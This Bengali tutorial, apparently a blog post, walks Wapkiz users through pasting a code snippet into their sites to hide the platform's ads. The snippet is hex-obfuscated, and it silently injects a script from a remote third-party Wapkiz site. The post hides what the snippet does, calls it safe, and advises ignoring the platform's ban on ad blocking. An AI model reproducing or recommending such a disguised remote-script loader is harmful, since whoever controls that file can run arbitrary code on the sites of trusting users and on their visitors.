আপনার অনেকেই ওয়াপকিজ নামে একটা প্লাটফরমের মাধ্যমে সাইট তৈরি করেন।ওয়াপকিজে ফ্রিতে মোবাইল ব্যবহার করে সাইট তৈরি করা যায়।এই সাইট ফ্রিতে সার্ভিস দেওয়ার কারনে তাদের ইনকামের জন্য আপনারা যে সাইট গুলো বানান ওই ওয়াপকিজ থেকে সবার সাইটের নিচে তাদের একটি এড থাকে যা অনেকেরই অপছন্দ।তাই আজকে আমরা দেখবো কিভাবে ওয়াপ কিজের এড ডিলিট অথবা হাইড করা যায়।
এটা কি সম্পুর্ণ AD HiDE হয়ঃ
হ্যাঁ, এটার মাধ্যমে আপনি আপনার সাইটের অনাকাংক্ষিত সকল AD HIDE করতে পারবেন।
যার কারনে আপনার সাইট দেখলে মনে হবে PHP সাইট ।আপনার সাইটের কোনো ডিজাইনে কোনো প্রভাব পড়বে না এই কোডটি আপনার সাইটে বসালে।
WapKiz Company সমস্যা করবে নাকিঃ
যদিও ওরা AD BLOCK করতে নিষেধ করেছে তারপরও আমার জানা মতে এখনো এই কারনে কোনো সাইটে সমস্যা করে নাই এই Wapkiz সাইট টি।আপনি নির্ভয়ে এই কোডটি আপনার সাইটে বসাতে পারবেন।
এটাতে কি অন্য কোনো এড আছেঃ
না আপনি এটাতে অন্য কোনো এড পাবেন নাহ।এই কোড আপনি ইচ্ছা মতো Use করতে পারবেন কোনো সমস্যা ছাড়াই।আপনারা অনেক সময় এড হাইড করতে গিয়ে অন্য এড এর ঝামেলা এর মুক্তি খুজেছেন তবে এই কোড ব্যবাহার করলে আপনার আর কোনো সমস্যা হবেনা।
এই কোড কাজ করে কিভাবেঃ
এই কোডটা কাজ করে বিভিন্ন ধরণের কোডের বাগ সৃষ্টি করে এবং কোডে কোডে ঝামেলা করে কোনো কোডই সো করে না, কিন্তু আপনার সাইটের আর কোনো কোডে সমস্যা যাতে না করে তারজন্য আমরা খেয়াল করেই কোডটি তৈরি করেছি।
WapKiz AD HIDE কিভাবে করবেনঃ
প্রথমে লগইন করুন আপনার WapKiz একাউন্টে।তারপর আপনার নির্দিষ্ট সাইট থেকে Panel Mode এ ক্লিক করুন।
এবার দেখবেন অনেক গুলো অপশন চলে আসছে ওখান থেকে আপনার নিচের ছবির চিন্হিত Js File Maker এ ক্লিক করুন।
এবার নিচের ছবির মতো Create New Js File এ ক্লিক করুন।
তারপর ফাঁকা বক্সে আপনি নিচের দেওয়া কোড কপি করে পেস্ট করে দিবেন।
var _0x8ecc=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x6B\x69\x6A\x61\x6E\x61\x2E\x77\x61\x70\x6B\x69\x7A\x2E\x63\x6F\x6D\x2F\x6A\x73\x2F\x31\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x3C\x74\x69\x74\x6C\x65\x3E","\x77\x72\x69\x74\x65"];document[_0x8ecc[1]](_0x8ecc[0])
এবার নিচের ছবির মতো Get Js file Code এ ক্লিক করুন।
নিচের দেওয়া ছবির মতো করে এখানে কোড টি কপি করে নিন।
আপনার ওয়াপকিজের যে কোনো পেজের নিচের দিকে খেয়াল করলে দেখতে পারবে নিচের ছবির মতো Edit Page লেখা একটি জায়গা ও একটি টেক্সট বক্স আছে।আপনি ওই বক্মে -2 টাইপ করবেন। তারপর Jump এ ক্লিক করবেন।

কাজ শেষ এর দিকে।এবার ফাঁকা বক্সে আপনার কপি করা কোডটি বসিয়ে দিন তারপর Position থেকে যত গুলো অপশন আসবে তার সবার নিচেরটা সিলেক্ট করবেন এবং Oke বাটনে ক্লিক করবেন।
এখন দেখবেন আপনার সাইটের ওয়াপকিজের অফিসিয়াল এড হাওয়া হয়ে গেছে।
এখন থেকে আপনার সাইটে আর কোনো এড আসবে না।আশা করি আপনাদের কোনো সমস্যা হবেনা। যদিও কোনো সমস্যা হয় তবে কমেন্ট এর মাধ্যমে জানিয়ে দিবেন।